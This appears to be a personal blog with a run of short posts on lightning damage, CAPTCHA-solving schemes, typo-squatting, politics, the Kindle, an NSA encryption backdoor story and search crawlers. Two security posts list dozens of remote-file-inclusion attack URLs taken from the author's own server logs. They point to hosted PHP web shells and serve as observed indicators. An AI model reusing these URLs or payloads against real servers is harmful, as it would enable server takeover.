Damn lightning…

Posted by jerry as lightning

I was awoke this morning by a storm coming in.  I really hate that sound in the middle of the night, because my kids are very afraid of storms.  I was counting to myself how long it would take to hear the first set of footsteps.

The rain picked up and the thunder rumbled on.  The kids did come down as I expected.  I convinced them to play in the family room and let my wife and I sleep a bit more.

It seemed like I had just fallen asleep when I heard and explosion and felt a blinding light shine through my closed eyes.  It was really close.  Probably hit a tree in my back yard.  Nothing seemed out of place, other than the ghost-white kids in my doorway.  The aquarium in my room was still working, and the bedroom light my oldest son turned on was sure as hell working.

My wife got up shortly after, and I went back to sleep.  (too many sleeping pills the night before - long story).  When I did wake up, I pulled my laptop out from under the bed, and unfortunately no Internet connection.

After a long morning of moving furniture and testing network ports, I found that I had 2 network cards die on me.  One in the new PC I had recently bought, and the other in the file server/firewall server in the basement.  I’ve spent a lot of money on lightning and surge protection for all of my equipment, including the cable modem, but apparently the EMP from the lightning induced a charge great enough to fry the two NICs.

Fortunately, I had some NICs laying around and got things running again, but that’s pretty frustrating.  I am glad that it was nothing more serious, though.

Have CAPTCHAs been broken? Sort of…

Posted by jerry as Security, web site

I just read this article about the Hannah Montana ticket debacle, and how it points to an apparent weakness is CAPTCHA.  Unfortunately, for CAPTCHA, the problem wasn’t some slick new algorithm designed by a miscreant that can reliably decipher the images, but rather establishing a network that grabs the CAPTCHA from one site, shoots it to a porn or warez we site that presents the same CAPTCHA to someone looking to score some boobies, who must answer the CAPTCHA before getting their prize.

It’s really quite clever, and I anticipate that the CAPTCHA breaking network will continue to mature, as we have seen with other malware.  Someone’s going to make a business case for hosting a service that has an input API that accepts an image, and returns the CAPTCHA text, and a similar API that presents the CAPTCHA much like an online ad, and accepts the CAPTCHA text as an input.  Sites that use the CAPTCHA and returned a “solution” are compensated in the same model as a click through for an online ad - think of it as adsense for bad people.  Except, it would be perfectly acceptable for the site owner to sit there all night and answer CAPTCHAs on his or her site, raking in the money.

On the other side, those looking to break the CAPTCHA would have to pay a small fee for a certain number of CAPTCHA credits.  The money would flow to the site owners, with the service owner keeping a service charge, of course.

 Honestly, that could spell the end for the widespread use of CAPTCHAs.  The only way to stop this is to make the CAPTCHA too difficult to read for a human, and that defeats the whole purpose.

So, in effect, CAPTCHA was broken without really breaking it.

Are domain parking companies complicit in typo-squatting?

Posted by jerry as web site

From this article 

“The domain name parking companies are providing a service. Whether or not you agree with the domain name owner’s decision to buy a certain domain name, it is not the parking company’s responsibility to police the internet and protect a company’s brand. That remains the responsibility of the brand itself. The brand or trademark owner should go after the domain owner, and not publicly lynch the domain parking companies:”

I would say that’s debatable.  Think about some “real world” parrellels:
Bootleg merchandise.  The retailer did not manfacture fake Nike shoes, he is just selling them.  It’s not his responsibility to police the goods that move through his store - that’s the responsibility of the real manufacturer.

Pirated music.  Napster, grokster, bearshare, guntella, and on and on, all claimed that they just provided a service, and there were legitimate, legal uses for the service, and that it was not their responsibility to police was was going through. 

Picture duplication.  Photo development companies claim that it’s not their responsibility to police what pictures they reproduce.  The copyright holder must do something to prevent unauthorized duplication.

In all those cases, the organization felt strongly in their footing.  But they key is that each one lost in a big way.  Like it or not, if you’re aiding in something that’s illegal, you’re complicit.  The question is where do you draw the line.  Should ISP’s have been held responsible in the music sharing cases?  Probably not.  Should the manufacturer of photo paper be held responsible for copyright infringement?  Probably not.  It’s a grey line, to be sure, but it seems pretty obvious that the domain parking companies are well on one side of the line.  The only thing missing are lawsuits and legislation now.

Conservatives Honing Gaydar?

Posted by jerry as politics

Given all of the wacky antics our conservative leadership has been, well, participating in, this, taken from Conservapedia is pretty funny:

Make no mistake, it’s clearly been “stuffed” by someone out to “bone” the repubs, but funny none-the-less.

Electotainment

Posted by jerry as news, politics

I just finished reading this article and have to respond.  The author doesn’t directly come out and say it, but is basically accusing the new media of dumbing down the political process, and we, the electorate are the victims.  We are NOT the victims… We are the cause.  Have you seen what’s on TV lately?  What are the most popular shows?  American Idol, Dancin with the Stars, reality show dejure.  The media is pavlov’s dog, and the public has been in control of the bell for a long time.  They are the monster the WE made. 

It isn’t that CNN doesn’t want to let loose Hillary’s view on Yucca Mountain!  CNN doesn’t want a million people saying “oh my god, this is boring shit.  Lets see what’s on Fox News.  Maybe there’s a police chase or a good apartment fire we can watch.”  And they’re right.  I may be interested in Hillary’s view on Yucca Mountain, the credit collapse, the slowing economy, what to do with Iran, but I represent a small minority that probably doesn’t fit into their demographic anyway. 

Up till recently, I hadn’t watched CNN or Fox News in about 2 years.  I was really bothered by what I saw when I did have a chance to watch it recently.  Every news show on CNN Headline News is presented by a “commentator”, not a reporter.  I could not believe that was Headline News.  It used to actually be 24 hours of an anchor person giving the news.  But, they’ve adapted to what the viewers want. 

 For pete’s sake, PLEASE STOP BLAMING THE MEDIA.  They’re doing what they do best - sell advertising.  They can’t sell advertising if no one watches their programming because “hard hitting journalism” can’t compete with Dancin with the Stars. 

Current crop of php include attempts

Posted by jerry as Hacking, Security, php

I’m not sure why I’m so fascinated by this crude and ineffective hacking attempt, but I am.  Here are the currently active hosts:

http://www.mta.cl/galeria2/galery2.jpg??
http://www.mta.cl/galeria2/galery.txt?
http://www.freewebtown.com/w8ting/safe.txt??
http://tools.aerofito.com/safeon.txt??
http://64.203.191.222/.check/c.txt?
http://www.ohanlonpaving.com/phpmic.txt.txt?
http://rotation.wooshck.org/image/safe.txt?
http://83.19.144.26/bo.do??
http://www.old2sold.net/newpitbulonspread.txt?
http://coolpc.com.tw/evaluate/safe?
http://www.ena-gmbh.de/download/cikos.txt?
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://www.freewebtown.com/komandan/tool/q3.txt?
http://www.manycontentz.com//ine/img/contr.txt??
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://electro.lydo.org/rfi/id.txt?
http://freewebs.com/chika_manis_banget/cmd.txt???
http://www.martinschaab.de/php/id.txt?
http://www.realtyna.com/about.gif??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.realtyna.com/safe.txt??
http://www.cluelesstravel.com/guestheath/id.txt??
http://bondick.net/flashchat/nick_image/htaccess?
http://kiopmanminsuion.chat.ru/http?
http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.martinschaab.de/php/phpSecurePages//phpSecurePages/u.txt?

kindle hype

Posted by jerry as kindle

I’ve been bombarded with kindle news everywhere I go today.  “It’s going to revolutionize the e-reading market”.  Really?  How big is the e-reading market?  Amazon seems to have really made the device as integrated and friendly as possible, but the reality is that you’re still stuck reading on a small screen.  I don’t like reading emails on my blackberry.  I hate web surfing on it, but I will in a pinch.  I cannot see myself “curling up” with a PDA-sized device to read a book.  It’s just not going to happen.  The really goes back to the days of the palm pilot.  I remember downloading ebooks to it, thinking to myself how cool it will be to have all these books with me wherever I go.  But, I never read one of them.  It was just not comfortable.  I have a hard time reading a book on a 19″ LCD monitor. 

The price is pretty steep as well.  Buying the box for $399, then needing to spend $10 to $20 per book just doesn’t seem likely.  I like gadgets as much as the next guy, but I do not see myself spending money on this.  In fact, I’ve been in a mode of device contraction.  I had a phone, a pocket PC, and an ipod.  Now, I’m down to a blackberry and a ipod, and if I could get rid of the ipod, I would.

Having said all of that, the EVDO access to content is pretty slick.

PHP include attacks rolling on…

Posted by jerry as Hacking, Security, php, search engine, web site

I’ve written about this a bit, and I’ve started a current attack list on networkstike.com, but the intensity seems to be increasing in these attempts.  I decide to google one of the URL’s that’s included, and right off the bat, I found this article from a web site that’s seeing the same thing.  I believe these attacks are being launched from a botnet, trolling for vulnerable sites to use for some kind of illicit business.

What was really interesting to me in my google search for some of the inclusion URLs is the number of log files that are available and indexed via google.  For a long time, I have gotten many hits with the referral set to a spammy site - an obvious attempt to get some clicks and link mojo with Google.   I never really thought a lot about it, but I can see that it’s probably a fairly effective thing, given the number of log files I found via google.

The current list of php inclusion hits for my sites is below:

http://www.s1ko.jazztel.es/safe.gif?
http://gw-gold.net/dragoc/id.txt?
http://musicgirll.chat.ru/wav/mysong?
http://www.mta.cl/galeria2/galery.txt?
http://www.mta.cl/galeria2/galery.jpg?
http://www.madinaedu.gov.sa/safeon.txt??
http://www.modelismo.alternativo.nom.br//poll/polldata/readme.txt??
http://shellbr.com.sapo.pt/safeon.txt??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.volontaridelrotary2040.com/html/modules/xt_conteudo/NewFile.txt?
http://telkomsex.com/ec.txt?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://neu.sv-badbentheim.de/hide.txt?
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages2.gif???
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages.gif???
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif??
http://www.hgbruce.com/components/com_rsgallery/safeon.txt??
http://tr-igus.com/safe.txt?
http://www.valerieataylor.com/gb/book2.gif??
http://servergazi.com/portal/images/stories/web.gif??
http://hackbsd.net/.xrt/safe.gif?
http://www.freewebtown.com/w8ting/safe.txt??
http://rumusic.chat.ru/rumusic.wav?
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://www.martinschaab.de/php/id.txt?
http://x0.741.com/pb.txt?
http://location-investment.com/Connections/r8.txt?
http://jjisdfiuw834wsdd.chat.ru/js?

I’ve started downloading the files and looking at them.  Many of them are loosly copied off of one another, some are exactly the same.  Some are quite complex, all-in-one shells, that would allow complete server control.  Most of them appear to give some basic information, like directory, available disk space, effetive UID and GID, and the like.

NSA Encryption backdoor?

Posted by jerry as NSA, Security, conspiracy, encryption

I am always skeptical of conspiracy in a given situation. The article is basically claiming that the NSA knowingly put a backdoor key in to an algorithm, then forced it into the standard doc. Oh, and it’s apparently ‘obvious’ that secret keys exist, whether known or unknown.

This reminds me a lot of the debate about the sboxes used in DES - the assumption was that the government did it to be able to crack DES, but turned out to be an intentional design element that actually increased the security of DES.

I can think of a few scenarios off hand:

1. The creator knew about the weakness and intentionally chose values that are very difficult to reverse engineer.  The algorithm is substantially secure to be trusted in spite of this.

2. No such set of second numbers are available, and this is a misunderstanding.

3. The creator legitamately did not know about the issue.  People in the NSA are crapping bricks now.

4. There in fact is a secret set of numbers in the algorithm and the NSA has a specific use in government applications for a computationally intensive, and recoverable application. They know that general use is not likely because of those two fact.

I can see some utility in a computationally expensive encryption algorithm. I have to believe that the NSA didn’t ’sneak’ in an algorithm that is so obviously inferior, expecting the world at large to use it so they can snoop. Despite iraq and 9/11, they really aren’t a dumb organization.

I think the real story here is that we have to be so suspicious of the motives of our government. Given the many spying stories, the telecom amnesty issue, Guantanamo Bay, the TSA, etc, it seems like a plausible story that the NSA really would do such a thing.  In that light, maybe I’m wrong - maybe they did try to pull one over on us. One thing’s for sure - we’ll never get an answer we can trust from the CIA.

Strange happenings at Microsoft’s Search Engine

Posted by jerry as search engine

So, with all of the looking at logs I’ve been doing lately, I noticed something really unusual.  Visits from hosts in the same range as the normal MSN bot that appears to be downloading whole pages (css, images, etc), which are referred from a search that looks like this:

http://search.live.com/results.aspx?q=myself&mrt=en-us&FORM=LIVSOP

 The keywords keep changing, and they are landing at different sites.  My theory is that MSN is going through an validating the search results for different terms, and analyzing the whole page - probably in an attempt to stop spam.  I suspect that it is running through the entire index of terms that are associated with the site and “viewing” each in turn.

I’m seeing this activity for all of the sites I own and manage.

 This appears to have been going on for about a week now.  Hopefully MSN is on to something that will help reduce the amount of spam in their search results.